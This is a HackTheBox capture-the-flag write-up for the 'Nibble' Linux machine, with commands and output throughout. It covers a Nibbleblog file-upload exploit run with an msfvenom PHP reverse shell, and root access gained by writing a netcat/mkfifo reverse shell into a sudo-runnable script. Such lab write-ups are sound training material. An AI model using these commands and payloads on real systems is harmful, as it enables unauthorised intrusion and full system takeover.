imported>Aghanim at 13:20, 18 February 2022

2022-02-18T13:20:07Z

New page

{{Infobox WriteUp
| name = Nibble
| platform = HackTheBox
| os = Linux
| difficulty = Easy
| techniques = Nibbleblog File Upload
}}

[[File:2022-02-image-8.png|thumb]]

This Linux machine was running a vulnerable blog running the engine Nibbleblog which was vulnerable to arbitrary file upload. To get root shell I used command injection i a script the user was able to run as sudo.

----

== Enumeration ==

I'll start with an NMAP scan.

<syntaxhighlight lang="bash">
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/nibbles]
└─# cat nmap.ver 1 ⨯
# Nmap 7.92 scan initiated Mon Jan 31 14:51:02 2022 as: nmap -p- -sC -sV --min-rate 10000 -oN nmap.ver 10.10.10.75
Nmap scan report for 10.10.10.75
Host is up (0.032s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
</syntaxhighlight>

There are two ports open, '''22 '''and '''80. '''

Visiting port 80 we are presented with a page that only says "Hello wordl!".

[[File:2022-02-image-9.png|thumb]]

Looking at the source code we can see that it mentions a directory '''/nibbleblog'''.

[[File:2022-02-Pasted-image-20220131210506.png|thumb]]

Visiting the subdri we are presented with this.

[[File:2022-02-image-10.png|thumb]]

At the bottom right we can see that it is powered by '''Nibbleblog. '''

I'll do a gobuster scan to see if there is anything interesting to find.

┌──(root💀kali)-[/home/aghanim/Desktop/HTB/nibbles]
└─# gobuster dir -u http://10.10.10.75/nibbleblog -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.75/nibbleblog
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/01/31 15:05:31 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 403) [Size: 306]
/.hta (Status: 403) [Size: 301]
/.htpasswd (Status: 403) [Size: 306]
/admin (Status: 301) [Size: 321] [--> http://10.10.10.75/nibbleblog/admin/]
/admin.php (Status: 200) [Size: 1401]
/content (Status: 301) [Size: 323] [--> http://10.10.10.75/nibbleblog/content/]
/index.php (Status: 200) [Size: 2987]
/languages (Status: 301) [Size: 325] [--> http://10.10.10.75/nibbleblog/languages/]
/plugins (Status: 301) [Size: 323] [--> http://10.10.10.75/nibbleblog/plugins/]
/README (Status: 200) [Size: 4628]
/themes (Status: 301) [Size: 322] [--> http://10.10.10.75/nibbleblog/themes/]

</pre>

Visiting the README subdir we can find the running version of nibbleblog, which is '''v4.0.3. '''

[[File:2022-02-Pasted-image-20220131211240.png|thumb]]

== Initial Access - Shell as Nibbler ==

=== Username && password ===

Looking in the directory '''/content/private '''I found a '''user.xml''' which contained a username '''admin. '''

[[File:2022-02-image-11.png|thumb]]

With some lucky guessing I was able to guess that the password is '''nibbles'''.

[[File:2022-02-image-12.png|thumb]]

=== Shell method 1 ===

I'll show two methods to get a shell. One using a script to get a shell and one doing it manually with uploading a php reverse shell.

I'll use [https://github.com/dix0nym/CVE-2015-6967/blob/main/exploit.py dix0nym's]script.

<syntaxhighlight lang="bash">
┌──(root💀kali)-[/home/…/Desktop/HTB/nibbles/CVE-2015-6967]
└─# msfvenom -p php/reverse_php LHOST=10.10.14.17 LPORT=4444 -f raw > shell.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 3009 bytes

┌──(root💀kali)-[/home/…/Desktop/HTB/nibbles/CVE-2015-6967]
└─# ls
exploit.py README.md shell.php

┌──(root💀kali)-[/home/…/Desktop/HTB/nibbles/CVE-2015-6967]
└─# python3 exploit.py --url http://10.10.10.75/nibbleblog/ --username admin --password nibbles --payload shell.php
[+] Login Successful.
[+] Upload likely successfull.
</syntaxhighlight>

And we get a connection back to our listener.

<syntaxhighlight lang="bash">
┌──(root💀kali)-[/home/aghanim]
└─# nc -lvnp 4444 1 ⨯
listening on [any] 4444 ...
connect to [10.10.14.17] from (UNKNOWN) [10.10.10.75] 53860
id
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
whoami
nibbler
</syntaxhighlight>

=== Method 2 ===

In the first method we created a php reverse shell which we will upload to the website.

[[File:2022-02-Pasted-image-20220131214054.png|thumb]]

The shell will be uploaded to '''/content/private/plugins/my_image/. '''The name '''shell.php''' is named to '''image.php'''. But that dosent mean anything as the file will still execute.

[[File:2022-02-Pasted-image-20220131214130.png|thumb]]

== Root ==

=== Enumeration ===

The user nibbler can run the following commands as sudo.

<syntaxhighlight lang="bash">
sudo -l
Matching Defaults entries for nibbler on Nibbles:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
</syntaxhighlight>

In nibbler home dir there is a '''zip''' file. Unzipping there is a file called monitor.sh

<syntaxhighlight lang="bash">
unzip personal.zip
Archive: personal.zip
creating: personal/
creating: personal/stuff/
inflating: personal/stuff/monitor.sh
</syntaxhighlight>

Opening monitor.sh there is just a script for monitoring '''Tecmint. '''

[[File:2022-02-image-13.png|thumb]]

=== Inject malicious command ===

I can read and write to the file, so I'll just inject a reverse shell and execute as sudo to get a root shell.

<syntaxhighlight lang="bash">
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.17 5555 > /tmp/f' > monitor.sh
cat monitor.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.17 5555 > /tmp/f
sudo ./monitor.sh
</syntaxhighlight>

And I get a connection to my listener and I'm root.

<syntaxhighlight lang="bash">
┌──(root💀kali)-[/home/aghanim]
└─# nc -lvnp 5555
listening on [any] 5555 ...
connect to [10.10.14.17] from (UNKNOWN) [10.10.10.75] 38336
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# ls
monitor.sh
# cd /root
# ls
root.txt
</syntaxhighlight>

== What I've learned ==

* Enumeration is one of the most important phases of a pentest. Doing a thorough enumeration will help with the initial access phase.* In this case there was a nibbleblog in a "hidden" subdirectory. I found a username in a user.xml file and guessed the password. * The website was running a vulnerable version of nibbleblog and we were able to upload a webshell and get a reverse shell. * Giving the user ability to run a script as root which we had full permissions to edit, we were able to inject a command that gave us reverse shell as root.

[[Category:HackTheBox]]
[[Category:Linux]]
[[Category:Write-ups]]

Write-ups/HTB/Nibble - Revision history

imported>Aghanim at 13:20, 18 February 2022